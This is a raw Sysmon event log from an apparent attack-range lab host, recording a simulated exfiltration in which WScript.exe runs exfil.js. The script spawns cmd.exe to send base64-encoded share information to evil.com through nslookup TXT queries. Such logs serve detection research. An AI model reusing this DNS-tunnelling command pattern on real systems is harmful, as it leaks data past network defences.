14:16:31.748{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200493Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.748{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200492Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.748{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200491Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.748{2E1864BB-17A1-629A-783D-000000005F02}55527540C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-7A40-000000005F02}7384C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200490Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.753{2E1864BB-17BF-629A-7A40-000000005F02}7384C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldnawh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200489Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.733{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljaj.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000200488Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.684{00000000-0000-0000-0000-000000000000}7320evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200487Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.594{00000000-0000-0000-0000-000000000000}7460evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.492{00000000-0000-0000-0000-000000000000}7432evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.387{00000000-0000-0000-0000-000000000000}5556evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.266{00000000-0000-0000-0000-000000000000}2600evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.178{00000000-0000-0000-0000-000000000000}7620evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.065{00000000-0000-0000-0000-000000000000}7992evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.918{00000000-0000-0000-0000-000000000000}2040evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.823{00000000-0000-0000-0000-000000000000}8000evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.741{00000000-0000-0000-0000-000000000000}6848evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000200478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.644{00000000-0000-0000-0000-000000000000}6044evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000200477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.717{2E1864BB-17BF-629A-7840-000000005F02}56206716C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7940-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.717{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.716{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.716{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.716{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.715{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7940-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.715{2E1864BB-17BF-629A-7740-000000005F02}29521772C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-7940-000000005F02}4848C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.715{2E1864BB-17BF-629A-7940-000000005F02}4848C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-7740-000000005F02}2952C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljaj.tmp 2>&1 10341000x8000000000000000200469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.679{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7840-000000005F02}5620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.679{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-7840-000000005F02}5620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.265{00000000-0000-0000-0000-000000000000}2600<unknown process>-udpfalsefalse127.0.0.1-52720-false127.0.0.1-53domain 354300x8000000000000000200466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.265{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52720- 354300x8000000000000000200465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.265{00000000-0000-0000-0000-000000000000}2600<unknown process>-udptruefalse127.0.0.1-52720-false127.0.0.1-53domain 354300x8000000000000000200464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.265{00000000-0000-0000-0000-000000000000}2600<unknown process>-udpfalsefalse127.0.0.1-52719-false127.0.0.1-53domain 354300x8000000000000000200463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.265{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52719- 354300x8000000000000000200462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.265{00000000-0000-0000-0000-000000000000}2600<unknown process>-udptruefalse127.0.0.1-52719-false127.0.0.1-53domain 354300x8000000000000000200461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.264{00000000-0000-0000-0000-000000000000}2600<unknown process>-udpfalsefalse127.0.0.1-52718-false127.0.0.1-53domain 354300x8000000000000000200460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.264{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52718- 354300x8000000000000000200459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.177{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-52717-false127.0.0.1-53domain 354300x8000000000000000200458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.177{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52717- 354300x8000000000000000200457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.177{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-52717-false127.0.0.1-53domain 354300x8000000000000000200456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.177{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-52716-false127.0.0.1-53domain 354300x8000000000000000200455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.177{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52716- 354300x8000000000000000200454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.177{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-52716-false127.0.0.1-53domain 354300x8000000000000000200453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.176{00000000-0000-0000-0000-000000000000}7620<unknown process>-udpfalsefalse127.0.0.1-52715-false127.0.0.1-53domain 354300x8000000000000000200452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.176{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52715- 354300x8000000000000000200451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.176{00000000-0000-0000-0000-000000000000}7620<unknown process>-udptruefalse127.0.0.1-52715-false127.0.0.1-53domain 354300x8000000000000000200450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{00000000-0000-0000-0000-000000000000}7992<unknown process>-udpfalsefalse127.0.0.1-52714-false127.0.0.1-53domain 354300x8000000000000000200449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52714- 10341000x8000000000000000200448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.679{2E1864BB-17BF-629A-7840-000000005F02}56206716C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-7740-000000005F02}2952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{00000000-0000-0000-0000-000000000000}7992<unknown process>-udptruefalse127.0.0.1-52714-false127.0.0.1-53domain 354300x8000000000000000200446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{00000000-0000-0000-0000-000000000000}7992<unknown process>-udpfalsefalse127.0.0.1-52713-false127.0.0.1-53domain 354300x8000000000000000200445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52713- 354300x8000000000000000200444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{00000000-0000-0000-0000-000000000000}7992<unknown process>-udptruefalse127.0.0.1-52713-false127.0.0.1-53domain 354300x8000000000000000200443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{00000000-0000-0000-0000-000000000000}7992<unknown process>-udpfalsefalse127.0.0.1-52712-false127.0.0.1-53domain 354300x8000000000000000200442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.062{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52712- 10341000x8000000000000000200441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-7840-000000005F02}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.664{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\